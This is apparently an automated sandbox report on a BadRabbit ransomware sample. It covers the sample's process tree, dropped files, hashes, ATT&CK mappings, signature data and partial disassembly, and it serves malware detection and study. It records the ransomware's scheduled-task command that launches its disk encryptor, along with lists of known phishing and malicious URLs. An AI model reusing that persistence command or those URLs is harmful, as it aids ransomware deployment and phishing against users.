        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_048557E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree, 2_2_048557E5
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04851531 GetVersion, 2_2_04851531
        Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match | File source: 11.0.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE
        ATT&CK matrix columns (tactics): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity InformationAcquire Infrastructure1
        Valid Accounts
        1
        Windows Management Instrumentation
        1
        LSASS Driver
        1
        LSASS Driver
        1
        Obfuscated Files or Information
        11
        Input Capture
        2
        System Time Discovery
        Remote Services11
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts22
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        LSASS Memory1
        File and Directory Discovery
        Remote Desktop Protocol11
        Input Capture
        22
        Encrypted Channel
        Exfiltration Over Bluetooth1
        System Shutdown/Reboot
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job
        1
        Valid Accounts
        1
        Valid Accounts
        1
        File Deletion
        Security Account Manager126
        System Information Discovery
        SMB/Windows Admin Shares1
        Clipboard Data
        1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts12
        Service Execution
        12
        Windows Service
        11
        Access Token Manipulation
        121
        Masquerading
        NTDS1
        Network Share Discovery
        Distributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchd1
        Scheduled Task/Job
        12
        Windows Service
        1
        Valid Accounts
        LSA Secrets141
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
        Bootkit
        112
        Process Injection
        31
        Virtualization/Sandbox Evasion
        Cached Domain Credentials31
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
        Scheduled Task/Job
        11
        Access Token Manipulation
        DCSync2
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
        Process Injection
        Proc Filesystem1
        Remote System Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit
        /etc/passwd and /etc/shadow1
        System Network Configuration Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Rundll32
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd2
        Indicator Removal
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Behavior Graph (the rendered graph was not captured; only its recoverable details follow). Behavior Graph ID: 1591384, Sample: download.exe, Start date: 14/01/2025, Architecture: WINDOWS, Score: 100.
        Domains/IPs: tse1.mm.bing.net; shed.dual-low.s-part-0017.t-0009.t-msedge.net; 3 other IPs or domains; 127.0.0.1 (svchost.exe); 173.222.162.32 ports 443, 445, 49749 (AKAMAI-ASUS, United States), 192.168.2.0 and 192.168.2.1 port 80 (rundll32.exe).
        Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 9 other signatures.
        Process tree: download.exe started rundll32.exe and conhost.exe and dropped C:\Windows\infpub.dat (data). rundll32.exe dropped C:\Windows\dispci.exe (PE32), C:\Windows\cscc.dat (PE32+) and C:\Windows\2594.tmp (data), started three cmd.exe instances and 3 other processes, and carries the signatures System process connects to network (likely due to code injection or exploit), Contains functionality to enumerate network shares of other devices, Clears the journal log, and 5 other signatures. A top-level cmd.exe started dispci.exe and conhost.exe (Drops executables to the windows directory (C:\Windows) and starts them). dispci.exe started cmd.exe and conhost.exe and carries Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Contains functionality to infect the boot sector, and Contains functionality to register a low level keyboard hook. The cmd.exe children of rundll32.exe started conhost.exe and schtasks.exe (Clears the journal log; Uses schtasks.exe or at.exe to add and modify task schedules) plus several other processes. svchost.exe and 10 other processes were also started at top level.

Source | Detection | Scanner | Label
download.exe | 97% | ReversingLabs | Win32.Ransomware.BadRabbit
download.exe | 89% | Virustotal |
download.exe | 100% | Avira | TR/Diskcoder.ezxim

Source | Detection | Scanner | Label
C:\Windows\dispci.exe | 100% | Avira | TR/Diskcoder.12354
C:\Windows\cscc.dat | 0% | ReversingLabs |
C:\Windows\dispci.exe | 97% | ReversingLabs | Win32.Ransomware.BadRabbit

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://192.168.2.1/d | 0% | Avira URL Cloud | safe
http://192.168.2.1/W | 0% | Avira URL Cloud | safe
http://192.168.2.1:80/top | 0% | Avira URL Cloud | safe
http://192.168.2.1/; | 0% | Avira URL Cloud | safe
http://192.168.2.1/ | 0% | Avira URL Cloud | safe
http://192.168.2.1/E | 0% | Avira URL Cloud | safe
http://diskcryptor.net/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
ax-0001.ax-msedge.net | 150.171.27.10 | true | false | | high
tse1.mm.bing.net | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://diskcryptor.net/ | rundll32.exe, 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000017.00000000.1746771759.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp, dispci.exe.2.dr, cscc.dat.2.dr | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 00000020.00000003.1762376215.00000111AFCFF000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr | false | | high
https://g.live.com/odclientsettings/ProdV2 | svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr | false | | high
http://192.168.2.1/; | rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | download.exe, cscc.dat.2.dr | false | | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://192.168.2.1/ | rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.168.2.1/d | rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | download.exe, cscc.dat.2.dr | false | | high
http://192.168.2.1/E | rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.168.2.1:80/top | rundll32.exe, 00000002.00000002.1763336798.0000000004955000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000020.00000003.1762376215.00000111AFCA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr | false | | high
http://192.168.2.1/W | rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
173.222.162.32 | unknown | United States | 35994 | AKAMAI-ASUS | true

IP
192.168.2.0
192.168.2.1
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1591384
Start date and time: 2025-01-14 23:24:57 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 55
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: download.exe
Detection: MAL
Classification: mal100.rans.spre.troj.spyw.evad.winEXE@58/8@2/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 90
• Number of non-executed functions: 139
Cookbook Comments:
• Found application associated with file extension: .exe
• Connection to analysis system has been lost, crash info: Unknown
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, smss.exe, dwm.exe, csrss.exe, winlogon.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 40.126.32.140, 40.126.32.138, 20.190.160.20, 40.126.32.134, 40.126.32.68, 40.126.32.136, 20.190.160.17, 40.126.32.74, 2.23.240.64, 204.79.197.203, 104.102.63.47, 2.23.227.215, 2.23.227.208, 2.21.65.154, 2.21.65.132, 20.199.58.43, 20.223.35.26, 13.107.246.45
• Excluded domains from analysis (whitelisted): otelrules.afd.azureedge.net, www.tm.lg.prod.aadmsa.akadns.net, p-static.bing.trafficmanager.net, iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, wildcard.weather.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, r.bing.com, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, e15275.d.akamaiedge.net, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, r.bing.com.edgekey.net, a-0003.a-msedge.net, tile-service.weather.microsoft.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, mm-mm.bing.net.trafficmanager.net, e1553.dspg.akamaiedge.net, azureedge-t-prod.trafficmanager.net, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com, api-msn-co
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:25:53 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
17:25:57 | API Interceptor | 2x Sleep call for process: svchost.exe modified
22:25:54 | Task Scheduler | Run new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit
Match: 173.222.162.32
Associated Sample Name / URL | Detection | Threat Name | Context
Mc.exe | malicious | Unknown |
a.exe | malicious | Unknown |
RgZaLjgCto.exe | malicious | Tinba |
JRDpxoBkBJ.exe | malicious | NotPetya |
smartsscreen.exe | malicious | Xmrig |
java.exe | malicious | Tinba |
java.exe | malicious | Tinba |
java.exe | malicious | Tinba |
p2pWin.exe | malicious | Petya / NotPetya, Mimikatz |

Match: ax-0001.ax-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
https://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9 | malicious | Unknown | 150.171.28.10
http://www.brillflooring.com | malicious | Unknown | 150.171.28.10
https://iyztciuamr.cfolks.pl/pp | malicious | Unknown | 150.171.28.10
https://metahorizonsfacebooksupport.tempisite.com/italy39 | malicious | HTMLPhisher | 150.171.27.10
http://tetsuyiq.pages.dev/ | malicious | HTMLPhisher | 150.171.27.10
https://informed.deliveryqdmox.top/us/ | malicious | HTMLPhisher | 150.171.27.10
https://9u2pd0kb4iw1eqefiwbh.shoptee.cc/index/user/login.html | malicious | HTMLPhisher | 150.171.27.10
https://indexrequestverse.pages.dev/ | malicious | HTMLPhisher | 150.171.28.10
phish_alert_sp2_2.0.0.0 (2).eml | malicious | Unknown | 150.171.28.10
http://ledger-recovery.co.uk/ | malicious | Unknown | 150.171.28.10

Match: s-part-0017.t-0009.t-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789 | malicious | Unknown | 13.107.246.45
habHh1BC0L.dll | malicious | Wannacry | 13.107.246.45
19MgUpI9tj.dll | malicious | Wannacry | 13.107.246.45
https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9d | malicious | Unknown | 13.107.246.45
hzQNazOx3Z.dll | malicious | Wannacry | 13.107.246.45
eIZi481eP6.dll | malicious | Wannacry | 13.107.246.45
Yx3rRuVx3c.dll | malicious | Wannacry | 13.107.246.45
sUlHfYQxNw.dll | malicious | Wannacry | 13.107.246.45
logitix.pdf | malicious | HTMLPhisher | 13.107.246.45
DHL AWB CUSTOM CLEARANCE.xls | malicious | Unknown | 13.107.246.45

Match: AKAMAI-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
mlfk8sYaiy.dll | malicious | Wannacry | 172.230.50.2
XML-702.msi | malicious | AteraAgent | 2.23.77.188
EFT_Payment_Notification_Gheenirrigation.html | malicious | HTMLPhisher | 2.19.126.89
MissedCall_Record_3295935663.html | malicious | Unknown | 2.19.126.85
62.122.184.98 (3).ps1 | malicious | LummaC | 104.102.49.254
Message.eml | malicious | HTMLPhisher | 184.28.90.27
PropostaOrcamentoPdf.msi | malicious | AteraAgent | 2.17.190.73
meth10.elf | malicious | Mirai | 104.84.5.44
meth1.elf | malicious | Mirai | 104.84.160.200
m68k.elf | malicious | Unknown | 23.203.64.19

No context

Match: C:\Windows\cscc.dat
Associated Sample Name / URL | Detection | Threat Name | Context
LisectAVT_2403002C_35.exe | malicious | Babuk, Mimikatz, TrojanRansom |
09490699.exe | malicious | Unknown |
09490699.exe | malicious | Unknown |
07bb0738.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine |
4d44bed6.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine |
63416c4d.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine |
irH9zMhZub.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine |
1jDe7zWnoe.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, Petya, RedLine |
bpkAAJptGv.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine |
4W5dQXszUV.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine |
Process: C:\Windows\dispci.exe
File Type: data
Category: dropped
Size (bytes): 50
Entropy (8bit): 1.5212424590621707
Encrypted: false
SSDEEP: 3:/lvlwjn:wjn
MD5: 4E97ED70D0F9DC5FCF032306DBBD9BDF
SHA1: F18AB3400BEF916BB2EAE4B2727906A7EA180C31
SHA-256: 591B13F80FD9555F9FA53F1AD3B4CA79E742B89006EACDA54D823F6CF37DDD43
SHA-512: B4B0C1C4B10F1E9199206E4538ACBF5DA7600023772549C7756C385E9B98B5F0777B4746936D371EECD0A29022E45CE174BA39444F2FC573659D993B711853AE
Malicious: false
Preview: ........................................user-PC$.
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x331799f1, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.4221603123935326
Encrypted: false
SSDEEP: 1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
MD5: E3C22FDCD63EEB3FF1832CD92F8EFC6D
SHA1: A26805133296D2B6AA8AB89B91179504153482BD
SHA-256: C35637D81B3F1DCDF0FE4E3A19BAF250F3158727AA053C4413E1628A91FFD166
SHA-512: 8EC1C9D7B7A37835875062456CC6A6067C8896EEF5F9433DD25A6E941B3474BF1CAD40C9D252AA3548E1AFEB03EF1C629F7CB47642B655914499E8368599B5BA
Malicious: false
Process: C:\Windows\dispci.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Tue Jan 14 21:25:50 2025, mtime=Tue Jan 14 21:25:55 2025, atime=Tue Jan 14 21:25:50 2025, length=142848, window=hide
Category: dropped
Size (bytes): 725
Entropy (8bit): 4.697714529827064
Encrypted: false
SSDEEP: 12:8iviLCQm/FMCXXUV5xfKB8VzjAaR6W+IWgL6CNb54VVILYumV:84HdZ0NieFAal+IWt2b54VVyfm
MD5: 529276EEC1D0C0D332420DF43AA5502E
SHA1: 379A9406BC4E2B3715548219A9D65B27829D0EDE
SHA-256: 45E4F67683F8199AEC9AFA6673CFC64DDC09508F3975A3CE451B5E755E4582BF
SHA-512: 25006C4B4C2196A7312DF05BE8CB16E1548F224BC70B9A2469F3A4C72DB54D2CB784F7F7B8BF3C20333A3D86D4EC7C6D0EC977A86197F49D082814426D7772AB
Malicious: false
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: data
Category: dropped
Size (bytes): 62328
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: C7CA77D847F1802502EF3B9228D388E4
SHA1: 80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
SHA-256: FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
SHA-512: B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
Malicious: true
Process: C:\Windows\System32\svchost.exe
File Type: JSON data
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 210632
Entropy (8bit): 6.677691827536191
Encrypted: false
SSDEEP: 3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
MD5: EDB72F4A46C39452D1A5414F7D26454A
SHA1: 08F94684E83A27F2414F439975B7F8A6D61FC056
SHA-256: 0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
SHA-512: D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
Malicious: true
Yara Hits:
• Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: LisectAVT_2403002C_35.exe, Detection: malicious
• Filename: 09490699.exe, Detection: malicious
• Filename: 09490699.exe, Detection: malicious
• Filename: 07bb0738.exe, Detection: malicious
• Filename: 4d44bed6.exe, Detection: malicious
• Filename: 63416c4d.exe, Detection: malicious
• Filename: irH9zMhZub.exe, Detection: malicious
• Filename: 1jDe7zWnoe.exe, Detection: malicious
• Filename: bpkAAJptGv.exe, Detection: malicious
• Filename: 4W5dQXszUV.exe, Detection: malicious
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):142848
                                                                    Entropy (8bit):6.314365095327337
                                                                    Encrypted:false
                                                                    SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                    MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                    SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                    SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                    SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\download.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):410760
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                    SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                    SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                    SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                    Malicious:true
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.891913976230692
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:download.exe
                                                                    File size:441'899 bytes
                                                                    MD5:fbbdc39af1139aebba4da004475e8839
                                                                    SHA1:de5c8d858e6e41da715dca1c019df0bfb92d32c0
                                                                    SHA256:630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
                                                                    SHA512:74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87
                                                                    SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                    TLSH:199412426729EE92D1E1B8F84093E7CC4BB97B090FB991EF9D993485CC79B8319380D5
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2..G2..G2..?...G2..?...G2......G2......G2..?...G2..G3..G2......G2......G2.Rich.G2.........................PE..L......Y...
                                                                    Icon Hash:2144b26d6c76b24d
                                                                    Entrypoint:0x4012c0
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows cui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x59EC0396 [Sun Oct 22 02:33:58 2017 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:e3bda9df66f1f9b2b9b7b068518f2af1
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 15/12/2016 19:00:00 17/12/2017 18:59:59
                                                                    Subject Chain
                                                                    • CN=Symantec Corporation, OU=STAR Security Engines, O=Symantec Corporation, L=Mountain View, S=California, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:015897C25450CE2E9CF3C42B623E4319
                                                                    Thumbprint SHA-1:AD96BB64BA36379D2E354660780C2067B81DA2E0
                                                                    Thumbprint SHA-256:C5E129D68BEF22CAF45A173328F33C244A3BDF3E959D8EC1F15DE556396247FA
                                                                    Serial:0EBFEA68D677B3E26CAB41C33F3E69DE
                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    mov eax, 000012ACh
                                                                    call 00007F327C7E0F28h
                                                                    mov eax, dword ptr [00408000h]
                                                                    xor eax, ebp
                                                                    mov dword ptr [ebp-04h], eax
                                                                    push esi
                                                                    mov esi, dword ptr [00404004h]
                                                                    push edi
                                                                    call esi
                                                                    mov edi, eax
                                                                    test edi, edi
                                                                    je 00007F327C7E0D32h
                                                                    lea eax, dword ptr [ebp-00001250h]
                                                                    push eax
                                                                    mov dword ptr [ebp-00001250h], 00000000h
                                                                    call esi
                                                                    push eax
                                                                    call dword ptr [00404050h]
                                                                    mov esi, eax
                                                                    test esi, esi
